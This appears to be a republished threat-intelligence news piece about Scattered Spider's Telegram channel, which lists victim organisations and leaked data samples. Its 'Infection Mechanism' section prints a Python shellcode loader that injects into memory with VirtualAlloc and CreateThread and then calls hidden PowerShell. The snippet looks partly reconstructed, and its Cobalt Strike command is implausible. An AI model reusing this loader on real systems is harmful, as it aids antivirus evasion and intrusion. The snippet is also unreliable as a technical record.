In early August 2025, a previously quiet cybercrime collective known as Scattered Spider resurfaced with a striking new Telegram channel that aggregates proof of its intrusions and data exfiltration operations.
The channel name fuses ShinyHunters, Scattered Spider, and Lapsus$, signaling a collaboration—or at least a shared brand—among several prolific extortion groups.
Within hours of its launch, the channel published screenshots of console access to Victoria’s Secret, a 100-entry customer data sample from Gucci, and lists of sellable databases from Neiman Marcus and Chanel.
DataBreaches analysts noted that this amalgamated channel has evolved beyond simple leak announcements into an almost real-time marketplace for stolen credentials and corporate documents.
Scattered Spider’s emergence as a public aggregator of multiple ransomware and data theft campaigns marks a departure from its earlier, more clandestine operations.
Historically, leak channels would post a single statement followed by a download link or sales instructions. In contrast, the new channel intersperses partial data dumps, “HMU if interested” sales pitches, memes, and direct threats to entities like the U.K. Ministry of Justice.
DataBreaches researchers identified scripts posted by the group for enumerating GitHub repositories belonging to the Legal Aid Agency.
.webp "Scattered Spider With New Telegram Channel List Organizations it Attacked 3")
This blend of proof and propaganda creates a sense of both transparency and terror.
The channel’s rapid revelations caused immediate alarm across industries. High-value targets including Disney, S&P Global, T-Mobile, Nvidia, Otelier, Coinbase, Burger King Brazil, Adidas, and Cisco were all named, with some incidents tying back to earlier Snowflake and Salesforce campaign leaks.
Government bodies did not escape: the U.S. Department of Homeland Security appeared in multiple posts displaying directory listings of servers, while screenshots hinted at negotiations over stolen court filings.
.webp "Scattered Spider With New Telegram Channel List Organizations it Attacked 4")
The channel’s frenetic pace and broad scope suggest Scattered Spider may be coordinating or rebranding data theft operations to maximize extortion leverage.
Infection Mechanism
Scattered Spider’s infection mechanism leverages a multi-stage approach beginning with spear-phishing and exploited VPN credentials.
Initial access scripts—shared in obfuscated Python snippets—automate the deployment of Cobalt Strike beacons.
A typical snippet revealed the use of a custom loader that decrypts and injects shellcode into memory without writing to disk:-
import ctypes, base64, subprocess
shellcode = base64.b64decode("...==")
ptr = ctypes.windll.kernel32.VirtualAlloc(None, len(shellcode), 0x3000, 0x40)
ctypes.memmove(ptr, shellcode, len(shellcode))
ctypes.windll.kernel32.CreateThread(None, 0, ptr, None, 0, None)
subprocess.call(["powershell", "-nop", "-w", "hidden", "-c", "Invoke-CobaltStrike"])This in-memory execution evades traditional antivirus scanners and endpoint detection tools.
Once the beacon is active, Scattered Spider escalates privileges via known Windows kernel vulnerabilities before deploying ransomware—or exfiltrating data for sale—within 48 hours of initial access.
Equip your SOC with full access to the latest threat data from ANY.RUN TI Lookup that can Improve incident response -> Get 14-day Free Trial
Source link
